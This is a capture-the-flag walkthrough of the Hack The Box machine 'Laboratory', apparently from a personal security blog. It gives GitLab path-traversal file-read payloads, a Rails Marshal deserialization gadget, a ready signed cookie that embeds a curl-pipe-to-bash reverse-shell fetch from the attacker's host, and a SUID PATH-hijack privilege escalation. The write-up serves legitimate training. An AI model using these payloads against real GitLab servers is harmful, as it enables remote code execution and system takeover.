Hackthebox - Laboratory

Summary

Laboratory is an easy box created by Hackthebox user 0xc45.
The initial foothold comes from a known GitLab vulnerability that gives arbitrary file read. The HackerOne thread for that issue shows how the file read turns into RCE: read secrets.yml, use the leaked secret_key_base to sign a malicious Marshal cookie, and get a shell as git inside a Docker container.
Enumerating the box, I took a gitlab-backup and saw that it contained a securedocker repository.
Extracting that repository gives dexter's SSH key and a user shell. Enumerating the box again as dexter, I found an interesting SUID binary, docker-security.
Running it under ltrace showed it calling chmod without an absolute path, so PATH hijacking gives a shell as root.

Foothold

nmap

Let's start with an nmap scan:

# Nmap 7.80 scan initiated Sun Nov 15 12:17:35 2020 as: nmap -Pn -sC -sV -oN nmap/laboratory 10.10.10.216
Nmap scan report for 10.10.10.216
Host is up (0.077s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 15 12:17:59 2020 -- 1 IP address (1 host up) scanned in 23.88 seconds

The TLS certificate in the nmap scan gives us two hostnames: laboratory.htb (the CN) and git.laboratory.htb (a SAN).

Let's add both to /etc/hosts and visit each site to see what the server hosts.

laboratory.htb

I didn't see anything interesting here; it is a static .html page. I started a gobuster scan in the background and moved on to the next thing.

git.laboratory.htb (Gitlab)

Visiting https://git.laboratory.htb/help shows the version as GitLab Community Edition 12.8.1.

Checking searchsploit, we see that this version may be vulnerable to arbitrary file read (the entry is written for 12.9.0, but the bug is also present in 12.8.1):

GitLab 12.9.0 - Arbitrary File Read                                                                                                                         | ruby/webapps/48431.txt

Some Google-fu also turned up the GitLab issue page for this bug (CVE-2020-10977, arbitrary file read when an issue is moved to another project).

Let's follow the steps to get the file read:

  • Create two projects.

  • In the first project, add an issue with the following description. The image reference looks like a normal upload, but the path traverses out of the uploads directory:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)  

  • Move the issue to the second project (Issue → Move issue). When an issue is moved, GitLab rewrites the upload references in the description and copies each referenced file into the new project without checking that the resolved path stays inside the uploads directory, so the copied "attachment" is /etc/passwd. Open the attachment link in the moved issue to read it.

That confirms arbitrary file read with the privileges of the GitLab application (the git user inside the container).
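To see why the payload escapes, here is a small pure-Ruby reproduction of the bug class (an added example, not code from this writeup or from GitLab): joining a user-supplied upload reference onto the uploads root without confinement, next to a hardened version that allow-lists the expected shape and refuses anything whose canonical path leaves the root. The uploads root and the "32-hex-character secret/filename" layout are assumptions for illustration, not taken from the box.

```ruby
# Assumed per-project uploads root (illustrative path, not the box's real one)
UPLOADS_ROOT = "/var/opt/gitlab/gitlab-rails/uploads/project-1"

# Constructed inputs: the traversal from the issue description (minus the
# leading "/uploads/") and a legitimate-looking upload reference.
TRAVERSAL = "11111111111111111111111111111111/" + "../" * 14 + "etc/passwd"
LEGIT     = "0123456789abcdef0123456789abcdef/report.png"

# Vulnerable: resolve whatever the markdown referenced. File.expand_path
# collapses every "../", so the result walks straight out of the root.
def resolve_unsafe(root, user_path)
  File.expand_path(user_path, root)
end

# Hardened: allow-list the "<32 hex secret>/<single filename component>" shape,
# canonicalise, and refuse any result that is not strictly below the root.
# Returns the absolute path, or nil when the reference is rejected.
def resolve_safe(root, user_path)
  return nil unless user_path.match?(%r{\A\h{32}/[^/\0]+\z})
  full = File.expand_path(user_path, root)
  return nil unless full.start_with?(root + "/")
  full
end

if __FILE__ == $0
  puts "unsafe: #{resolve_unsafe(UPLOADS_ROOT, TRAVERSAL)}"   # leaves the root
  puts "safe:   #{resolve_safe(UPLOADS_ROOT, TRAVERSAL).inspect}" # rejected
  puts "safe:   #{resolve_safe(UPLOADS_ROOT, LEGIT)}"
end
```

The allow-list alone is not enough (a filename of ".." passes the regex), which is why the canonical-path check is kept as the second gate; both together are what the upload rewriter on the box was missing.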

Now, what to read? Back to Google-fu, which found the HackerOne thread for the issue.

It shows that we can read GitLab's secrets file:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

That file holds secret_key_base, the key Rails uses to sign cookies. GitLab's experimentation_subject_id cookie is a signed cookie whose value is deserialized with Marshal, so with the key we can sign a Marshal payload of our choosing and get code execution in the Rails process. The thread uses the following gadget, run from a Rails console with the target's secrets.yml in place, to generate the cookie:

# Build a request so the app's cookie jar (and its secret_key_base) can be used
request = ActionDispatch::Request.new(Rails.application.env_config)
# Force the Marshal serializer so the cookie value is a Marshal dump
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar

# ERB template whose #result runs the shell command inside the backticks
erb = ERB.new("<%= `your code` %>")
# The deprecation proxy forwards any method call made on it after Marshal.load
# to erb.result, which evaluates the template and therefore the command
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
# Sign the gadget with secret_key_base; the printed string is the cookie to send
cookies.signed[:cookie] = depr
puts cookies[:cookie]

So I started a GitLab container of the same version locally, replaced its secrets.yml with the leaked one, and opened a Rails console:

sudo docker run --rm -d -p 4443:443 -p 8090:80 -p 2222:22 --name gitlab gitlab/gitlab-ce:12.8.1-ce.0
sudo docker exec -ti gitlab bash
vi /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
<put the content of what we got>
gitlab-rails console

Then paste the gadget above into the console to generate the cookie. In my case the command in the ERB template was curl http://10.10.14.13/shell.sh | bash, which fetches and runs a reverse shell from my machine.

Sending the cookie to any GitLab endpoint is enough to trigger the deserialization:

curl -vvv -k 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiaSNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBjdXJsIGh0dHA6Ly8xMC4xMC4xNC4xMy9zaGVsbC5zaCB8IGJhc2hgICkudG9fcyk7IF9lcmJvdXQGOgZFRjoOQGVuY29kaW5nSXU6DUVuY29kaW5nClVURi04BjsKRjoTQGZyb3plbl9zdHJpbmcwOg5AZmlsZW5hbWUwOgxAbGluZW5vaQA6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiDEByZXN1bHQGOwpUOhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpU--94b17553fb6a110472a87df915e1a5765a25219b"

and we get a reverse shell as git inside the GitLab container.
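Why does a leaked secret_key_base hand over code execution? The gadget above needs a full Rails console, but the signing itself is simple enough to reproduce without Rails. The following is an added example (not code from this writeup, from GitLab or from the HackerOne report) that rebuilds the Rails 6 signed-cookie format in plain Ruby: the signing key is derived from secret_key_base with PBKDF2-HMAC-SHA1 (1000 iterations, salt "signed cookie", 64-byte key), the value is Base64 of a Marshal dump, and the signature is a hex HMAC-SHA1 over that Base64, joined with "--" exactly as in the cookie sent above. The secret_key_base and the payload are constructed for the demo; with the real key from secrets.yml the same forge function signs any Marshal object, which is all the server checks before it calls Marshal.load.

```ruby
require "openssl"
require "base64"

# Constructed secret standing in for the secret_key_base read from secrets.yml
SECRET_KEY_BASE = "0123456789abcdef" * 8

# Rails 6 defaults for cookies.signed (ActiveSupport::KeyGenerator + MessageVerifier)
SIGNED_COOKIE_SALT = "signed cookie"
KEY_ITERATIONS     = 1000
KEY_SIZE           = 64

# Derive the per-purpose signing key the way Rails.application.key_generator does
def signing_key(secret_key_base)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, SIGNED_COOKIE_SALT, KEY_ITERATIONS, KEY_SIZE)
end

# Constant-time comparison so a verifier does not leak the MAC byte by byte
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Produce "<base64(Marshal.dump(obj))>--<hex HMAC-SHA1>", the wire format of a signed cookie
def forge_signed_cookie(secret_key_base, obj)
  data = Base64.strict_encode64(Marshal.dump(obj))
  "#{data}--#{OpenSSL::HMAC.hexdigest("SHA1", signing_key(secret_key_base), data)}"
end

# What the server does on every request: check the MAC, then Marshal.load the value.
# Returns the deserialized object, or nil when the signature does not verify.
def verify_signed_cookie(secret_key_base, cookie)
  data, digest = cookie.split("--", 2)
  return nil if data.nil? || digest.nil?
  expected = OpenSSL::HMAC.hexdigest("SHA1", signing_key(secret_key_base), data)
  return nil unless secure_compare(digest, expected)
  # Marshal.load of attacker-signed bytes is the RCE primitive: it rebuilds arbitrary
  # Ruby objects, including the ERB/deprecation-proxy gadget, with no class allow-list.
  Marshal.load(Base64.strict_decode64(data))
end

if __FILE__ == $0
  cookie = forge_signed_cookie(SECRET_KEY_BASE, { "subject" => "demo" })
  puts "experimentation_subject_id=#{cookie}"
  puts verify_signed_cookie(SECRET_KEY_BASE, cookie).inspect
end
```

Nothing about the payload's class is validated before Marshal.load; the only gate is the HMAC, so custody of secret_key_base equals the ability to run code in the Rails process. That is why the file read alone is treated as critical, and why secret_key_base must be rotated after any disclosure of secrets.yml.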

User

Enumerating the box, I ran gitlab-backup create and saw a repository dexter/securedocker in the backup, so I copied the backup tarball to my local machine.

The backup stores each repository as a git bundle (under @hashed/, named by the SHA-256 of the project ID), which git can clone directly:

git clone ../repositories/@hashed/19/58/19581e27de7ced00ff1ce50b2047e7a567c76b1cbaebabe5ef03f7c3017bb5b7.bundle

Checking the repository, we find dexter's SSH private key.

Using it, we get a user shell:

ssh -i ./dexter dexter@laboratory.htb

Root

Running linpeas as dexter, I saw an interesting SUID binary:

/usr/local/bin/docker-security

Let's run it under ltrace to see what it does:

ltrace /usr/local/bin/docker-security
setuid(0) = -1
setgid(0) = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
+++ exited (status 0) +++

That looks like a PATH hijacking opportunity: the binary calls system("chmod ..."), and system() runs the command through /bin/sh, which looks chmod up via PATH rather than by absolute path. (The setuid(0) = -1 and the chmod failures are artefacts of tracing: the kernel does not honour the SUID bit for a ptraced process, so under ltrace the binary runs with dexter's privileges. Run directly, setuid(0) succeeds.)

So, with a fake chmod placed first in PATH:

cd $(mktemp -d)
echo "bash" > chmod
chmod 777 ./chmod
PATH=$(pwd):$PATH docker-security

Because the binary calls setuid(0) and setgid(0) before system(), the fake chmod (a script with no shebang, so /bin/sh runs it) starts bash with real and effective UID 0; no bash -p is needed since there are no privileges left to drop. From that shell we can grab root.txt.

and we have pwned Laboratory 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/laboratory/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.